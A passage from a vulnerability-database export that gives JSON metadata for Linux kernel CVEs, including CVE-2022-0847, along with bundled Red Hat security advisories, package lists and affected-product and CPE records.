        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-29266"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3489"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-29657"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-29649"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28951"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3490"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3491"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-29646"
      },
      {
        "trust": 0.1,
        "url": "https://issues.jboss.org/):"
      },
      {
        "trust": 0.1,
        "url": "https://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-33194"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:4627"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-388497"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-28971"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-010252"
      },
      {
        "db": "PACKETSTORM",
        "id": "162969"
      },
      {
        "db": "PACKETSTORM",
        "id": "162981"
      },
      {
        "db": "PACKETSTORM",
        "id": "162939"
      },
      {
        "db": "PACKETSTORM",
        "id": "164875"
      },
      {
        "db": "PACKETSTORM",
        "id": "165296"
      },
      {
        "db": "PACKETSTORM",
        "id": "164837"
      },
      {
        "db": "PACKETSTORM",
        "id": "162549"
      },
      {
        "db": "PACKETSTORM",
        "id": "164967"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202103-1258"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-28971"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-388497"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-28971"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-010252"
      },
      {
        "db": "PACKETSTORM",
        "id": "162969"
      },
      {
        "db": "PACKETSTORM",
        "id": "162981"
      },
      {
        "db": "PACKETSTORM",
        "id": "162939"
      },
      {
        "db": "PACKETSTORM",
        "id": "164875"
      },
      {
        "db": "PACKETSTORM",
        "id": "165296"
      },
      {
        "db": "PACKETSTORM",
        "id": "164837"
      },
      {
        "db": "PACKETSTORM",
        "id": "162549"
      },
      {
        "db": "PACKETSTORM",
        "id": "164967"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202103-1258"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-28971"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2021-03-22T00:00:00",
        "db": "VULHUB",
        "id": "VHN-388497"
      },
      {
        "date": "2021-03-22T00:00:00",
        "db": "VULMON",
        "id": "CVE-2021-28971"
      },
      {
        "date": "2022-06-28T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2021-010252"
      },
      {
        "date": "2021-06-04T13:36:04",
        "db": "PACKETSTORM",
        "id": "162969"
      },
      {
        "date": "2021-06-04T22:09:37",
        "db": "PACKETSTORM",
        "id": "162981"
      },
      {
        "date": "2021-06-03T14:55:48",
        "db": "PACKETSTORM",
        "id": "162939"
      },
      {
        "date": "2021-11-10T17:10:23",
        "db": "PACKETSTORM",
        "id": "164875"
      },
      {
        "date": "2021-12-15T15:27:05",
        "db": "PACKETSTORM",
        "id": "165296"
      },
      {
        "date": "2021-11-10T17:04:39",
        "db": "PACKETSTORM",
        "id": "164837"
      },
      {
        "date": "2021-05-12T13:52:40",
        "db": "PACKETSTORM",
        "id": "162549"
      },
      {
        "date": "2021-11-15T17:25:56",
        "db": "PACKETSTORM",
        "id": "164967"
      },
      {
        "date": "2021-03-22T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202103-1258"
      },
      {
        "date": "2021-03-22T17:15:15.137000",
        "db": "NVD",
        "id": "CVE-2021-28971"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2022-07-12T00:00:00",
        "db": "VULHUB",
        "id": "VHN-388497"
      },
      {
        "date": "2021-03-30T00:00:00",
        "db": "VULMON",
        "id": "CVE-2021-28971"
      },
      {
        "date": "2022-06-28T06:12:00",
        "db": "JVNDB",
        "id": "JVNDB-2021-010252"
      },
      {
        "date": "2022-07-14T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202103-1258"
      },
      {
        "date": "2023-11-07T03:32:25.290000",
        "db": "NVD",
        "id": "CVE-2021-28971"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "162969"
      },
      {
        "db": "PACKETSTORM",
        "id": "162939"
      },
      {
        "db": "PACKETSTORM",
        "id": "162549"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202103-1258"
      }
    ],
    "trust": 0.9
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux\u00a0Kernel\u00a0 Resource exhaustion vulnerability in",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-010252"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "resource management error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202103-1258"
      }
    ],
    "trust": 0.6
  }
}

var-202203-0043
Vulnerability from variot

A flaw was found in the way the "flags" member of the new pipe buffer structure was lacking proper initialization in copy_page_to_iter_pipe and push_pipe functions in the Linux kernel and could thus contain stale values. An unprivileged local user could use this flaw to write to pages in the page cache backed by read only files and as such escalate their privileges on the system. Linux Kernel Has an initialization vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Summary:

The Migration Toolkit for Containers (MTC) 1.5.4 is now available. Description:

The Migration Toolkit for Containers (MTC) enables you to migrate Kubernetes resources, persistent volume data, and internal container images between OpenShift Container Platform clusters, using the MTC web console or the Kubernetes API. Bugs fixed (https://bugzilla.redhat.com/):

1995656 - CVE-2021-36221 golang: net/http/httputil: panic due to racy read of persistConn after handler panic

  1. Description:

Red Hat Advanced Cluster Management for Kubernetes 2.3.8 images

Red Hat Advanced Cluster Management for Kubernetes provides the capabilities to address common challenges that administrators and site reliability engineers face as they work across a range of public and private cloud environments. Clusters and applications are all visible and managed from a single console—with security policy built in.

This advisory contains the container images for Red Hat Advanced Cluster Management for Kubernetes, which fix several bugs. See the following Release Notes documentation, which will be updated shortly for this release, for additional details about this release:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.3/html/release_notes/

Security updates:

  • nanoid: Information disclosure via valueOf() function (CVE-2021-23566)

  • nodejs-shelljs: improper privilege management (CVE-2022-0144)

  • follow-redirects: Exposure of Private Personal Information to an Unauthorized Actor (CVE-2022-0155)

  • node-fetch: exposure of sensitive information to an unauthorized actor (CVE-2022-0235)

  • follow-redirects: Exposure of Sensitive Information via Authorization Header leak (CVE-2022-0536)

Bug fix:

  • RHACM 2.3.8 images (Bugzilla #2062316)

  • Bugs fixed (https://bugzilla.redhat.com/):

2043535 - CVE-2022-0144 nodejs-shelljs: improper privilege management 2044556 - CVE-2022-0155 follow-redirects: Exposure of Private Personal Information to an Unauthorized Actor 2044591 - CVE-2022-0235 node-fetch: exposure of sensitive information to an unauthorized actor 2050853 - CVE-2021-23566 nanoid: Information disclosure via valueOf() function 2053259 - CVE-2022-0536 follow-redirects: Exposure of Sensitive Information via Authorization Header leak 2062316 - RHACM 2.3.8 images

  1. 8.1) - aarch64, noarch, ppc64le, s390x, x86_64

  2. Description:

The kernel packages contain the Linux kernel, the core of any Linux operating system. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

===================================================================== Red Hat Security Advisory

Synopsis: Important: kernel-rt security and bug fix update Advisory ID: RHSA-2022:0819-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2022:0819 Issue date: 2022-03-10 CVE Names: CVE-2021-0920 CVE-2021-4154 CVE-2022-0330 CVE-2022-0435 CVE-2022-0492 CVE-2022-0847 CVE-2022-22942 =====================================================================

  1. Summary:

An update for kernel-rt is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

  1. Relevant releases/architectures:

Red Hat Enterprise Linux Real Time for NFV (v. 8) - x86_64 Red Hat Enterprise Linux for Real Time (v. 8) - x86_64

  1. Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.

Security Fix(es):

  • kernel: improper initialization of the "flags" member of the new pipe_buffer (CVE-2022-0847)

  • kernel: Use After Free in unix_gc() which could result in a local privilege escalation (CVE-2021-0920)

  • kernel: local privilege escalation by exploiting the fsconfig syscall parameter leads to container breakout (CVE-2021-4154)

  • kernel: possible privileges escalation due to missing TLB flush (CVE-2022-0330)

  • kernel: remote stack overflow via kernel panic on systems using TIPC may lead to DoS (CVE-2022-0435)

  • kernel: cgroups v1 release_agent feature may allow privilege escalation (CVE-2022-0492)

  • kernel: failing usercopy allows for use-after-free exploitation (CVE-2022-22942)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Bug Fix(es):

  • kernel symbol '__rt_mutex_init' is exported GPL-only in kernel 4.18.0-348.2.1.rt7.132.el8_5 (BZ#2038423)

  • kernel-rt: update RT source tree to the RHEL-8.5.z3 source tree (BZ#2045589)

  • Solution:

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

  1. Bugs fixed (https://bugzilla.redhat.com/):

2031930 - CVE-2021-0920 kernel: Use After Free in unix_gc() which could result in a local privilege escalation 2034514 - CVE-2021-4154 kernel: local privilege escalation by exploiting the fsconfig syscall parameter leads to container breakout 2042404 - CVE-2022-0330 kernel: possible privileges escalation due to missing TLB flush 2044809 - CVE-2022-22942 kernel: failing usercopy allows for use-after-free exploitation 2048738 - CVE-2022-0435 kernel: remote stack overflow via kernel panic on systems using TIPC may lead to DoS 2051505 - CVE-2022-0492 kernel: cgroups v1 release_agent feature may allow privilege escalation 2060795 - CVE-2022-0847 kernel: improper initialization of the "flags" member of the new pipe_buffer

  1. Package List:

Red Hat Enterprise Linux Real Time for NFV (v. 8):

Source: kernel-rt-4.18.0-348.20.1.rt7.150.el8_5.src.rpm

x86_64: kernel-rt-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-core-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-debug-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-debug-core-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-debug-debuginfo-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-debug-devel-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-debug-kvm-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-debug-modules-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-debug-modules-extra-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-debuginfo-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-debuginfo-common-x86_64-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-devel-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-kvm-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-modules-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-modules-extra-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm

Red Hat Enterprise Linux for Real Time (v. 8):

Source: kernel-rt-4.18.0-348.20.1.rt7.150.el8_5.src.rpm

x86_64: kernel-rt-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-core-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-debug-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-debug-core-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-debug-debuginfo-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-debug-devel-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-debug-modules-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-debug-modules-extra-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-debuginfo-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-debuginfo-common-x86_64-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-devel-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-modules-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-modules-extra-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

  1. References:

https://access.redhat.com/security/cve/CVE-2021-0920 https://access.redhat.com/security/cve/CVE-2021-4154 https://access.redhat.com/security/cve/CVE-2022-0330 https://access.redhat.com/security/cve/CVE-2022-0435 https://access.redhat.com/security/cve/CVE-2022-0492 https://access.redhat.com/security/cve/CVE-2022-0847 https://access.redhat.com/security/cve/CVE-2022-22942 https://access.redhat.com/security/updates/classification/#important https://access.redhat.com/security/vulnerabilities/RHSB-2022-002

  1. Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1

iQIVAwUBYippFNzjgjWX9erEAQhDwRAAjsGfW6qXFI81H8xov/wQnw/PdsUOhzDl ISzJEeXALEQCloLH+UDcgo/wV1es00USfBo1H/SpDc5ahjBWP2pbo8QtIRKT6h/k ord4KsAMGjqWRI+zaGbaFoL0q4okMG9H6r731TnhX06CaLXLui8iUJrQLziHo02t /AihF9dW30/w4tXyKeMc73D1lKHImQQFfJo5xpIo8Mm7+6GFrkne8Z46SKXjjyfG IODAcU3wA0C93bbtR4EHEbenVyVVaE5Phn40vxxF00+AQTHoc5nYpOJbDLI3bi1F GbEKQ5pf0jkScwlfEHtHkmjPk92PA/wV41BhPoJw8oKshH4RRxml4Ps0KldI4NrQ ypmDLZ3CfJ+saFbNLN5BARCiqJavF5A4yszHZ5QuopmC1RJx6/rAuE79KkeB0JvW IOaXPzzc05dCqdyVBvNAu+XpVlTbe+XGBR0LalYYjYWxQSrEYAYQ005mcvEWOPRm QfPSM7eOaAzo9RGrMirTm0Gz9BJ0TbvNGiMmMTpLdb6akx1BQcQ5bpAjUCQN0O7j KIFri0FxflweqZswTchfdbW74VuUyTVaeFYKGhp5hFPV6lFkDUFEFC71ANvPaewE X1Z5Ae0gFMD8w5m5eePHqYuEaL6NHtYctHlBh0ef6mrvsKq9lmxJpdXrZUO+eP4w nEhPbkKSmMY= =CLN6 -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202203-0043",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "codeready linux builder",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.8"
      },
      {
        "model": "enterprise linux server for power little endian update services for sap solutions",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.1"
      },
      {
        "model": "h700s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "enterprise linux eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.2"
      },
      {
        "model": "enterprise linux for real time for nfv",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8"
      },
      {
        "model": "enterprise linux for real time for nfv tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.2"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.16.11"
      },
      {
        "model": "ovirt-engine",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "ovirt",
        "version": "4.4.10.2"
      },
      {
        "model": "h500s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "enterprise linux for ibm z systems eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.4"
      },
      {
        "model": "enterprise linux server update services for sap solutions",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.1"
      },
      {
        "model": "enterprise linux for ibm z systems",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.0"
      },
      {
        "model": "sma1000",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "sonicwall",
        "version": "12.4.2-02044"
      },
      {
        "model": "enterprise linux for power little endian eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.4"
      },
      {
        "model": "enterprise linux server for power little endian update services for sap solutions",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.2"
      },
      {
        "model": "scalance lpe9403",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "2.0"
      },
      {
        "model": "enterprise linux for real time tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.4"
      },
      {
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "35"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.4"
      },
      {
        "model": "enterprise linux server update services for sap solutions",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.2"
      },
      {
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.4"
      },
      {
        "model": "enterprise linux for power little endian",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.0"
      },
      {
        "model": "h700e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "h410c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.15"
      },
      {
        "model": "enterprise linux for real time",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8"
      },
      {
        "model": "h500e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "enterprise linux for ibm z systems eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.2"
      },
      {
        "model": "enterprise linux eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.4"
      },
      {
        "model": "h300e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.15.25"
      },
      {
        "model": "enterprise linux for real time for nfv tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.4"
      },
      {
        "model": "enterprise linux for real time tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.2"
      },
      {
        "model": "enterprise linux for power little endian eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.2"
      },
      {
        "model": "enterprise linux server for power little endian update services for sap solutions",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.4"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.2"
      },
      {
        "model": "h410s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.16"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.10.102"
      },
      {
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.2"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.0"
      },
      {
        "model": "virtualization host",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "4.0"
      },
      {
        "model": "enterprise linux server update services for sap solutions",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.4"
      },
      {
        "model": "h300s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "fedora",
        "scope": null,
        "trust": 0.8,
        "vendor": "fedora",
        "version": null
      },
      {
        "model": "sma1000",
        "scope": null,
        "trust": 0.8,
        "vendor": "sonicwall",
        "version": null
      },
      {
        "model": "red hat enterprise linux eus",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u30ec\u30c3\u30c9\u30cf\u30c3\u30c8",
        "version": null
      },
      {
        "model": "h300s",
        "scope": null,
        "trust": 0.8,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "ovirt-engine",
        "scope": null,
        "trust": 0.8,
        "vendor": "ovirt",
        "version": null
      },
      {
        "model": "red hat enterprise linux for ibm z systems - extended update support",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u30ec\u30c3\u30c9\u30cf\u30c3\u30c8",
        "version": null
      },
      {
        "model": "red hat enterprise linux for ibm z systems",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u30ec\u30c3\u30c9\u30cf\u30c3\u30c8",
        "version": null
      },
      {
        "model": "kernel",
        "scope": null,
        "trust": 0.8,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "red hat enterprise linux",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u30ec\u30c3\u30c9\u30cf\u30c3\u30c8",
        "version": null
      },
      {
        "model": "scalance lpe9403",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u30b7\u30fc\u30e1\u30f3\u30b9",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-007117"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-0847"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.16.11",
                "versionStartIncluding": "5.16",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.15.25",
                "versionStartIncluding": "5.15",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.10.102",
                "versionStartIncluding": "5.8",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_eus:8.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:8.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:8.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_real_time:8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:8.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_eus:8.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_real_time_for_nfv_tus:8.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_real_time_for_nfv_tus:8.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_real_time_tus:8.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_real_time_tus:8.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:8.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_real_time_for_nfv:8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_update_services_for_sap_solutions:8.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_update_services_for_sap_solutions:8.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_update_services_for_sap_solutions:8.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
